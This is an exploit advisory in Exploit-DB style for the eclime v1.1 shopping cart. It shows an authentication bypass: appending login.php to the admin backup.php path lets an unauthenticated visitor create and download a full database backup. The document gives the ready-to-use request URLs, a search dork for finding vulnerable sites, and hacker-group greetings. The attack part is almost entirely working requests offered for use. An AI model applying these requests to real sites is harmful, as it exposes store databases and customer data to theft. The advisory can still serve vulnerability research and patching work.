1 ========================================================================================
2 | # Title : eclime v1.1 => by Pass / Creat and Download Backup Vulnerability
3 | # Author : indoushka
4 | # email : indoushka@hotmail.com
5 | # Home : www.iqs3cur1ty.com/vb
6 | # Dork : Powered by eclime.com
7 | # Tested on: windows SP2 Français V.(Pnx2 2.0)
8 | # Bug : Backup
9 ====================== Exploit By indoushka =================================
10 # Exploit :
11 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
12 eclime v1.1 (March 2010)
13 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
14 eclime is a free opensource smarty based shopping cart
15 build on osCommerce 2.2 solid engine, with many useful
16 contributions added.
17
18 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
19
20 http://127.0.0.1/eclime/admin/backup.php/login.php?action=backup
21
22 http://127.0.0.1/eclime/admin/backup.php/login.php?action=backupnow
23
24 to download buckup : http://127.0.0.1/eclime/admin/backup.php/login.php?action=download&file=db_comm−20100301222138.s
ql
25
26 db_comm−20100301222138.sql chang it to the name of the backup and you cant download it with IE i download it with ope
ra 10.10 + Mozilla Firefox
27
28
29 Dz−Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===============
=====
30 Greetz :
31 Exploit−db Team :
32 (loneferret+Exploits+dookie2000ca)
33 all my friend :
34 His0k4 * Hussin−X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c−s3curity.cc)
35 Stake (www.v4−team.com) * r1z (www.sec−r1z.com) * D4NB4R http://www.ilegalintrusion.ne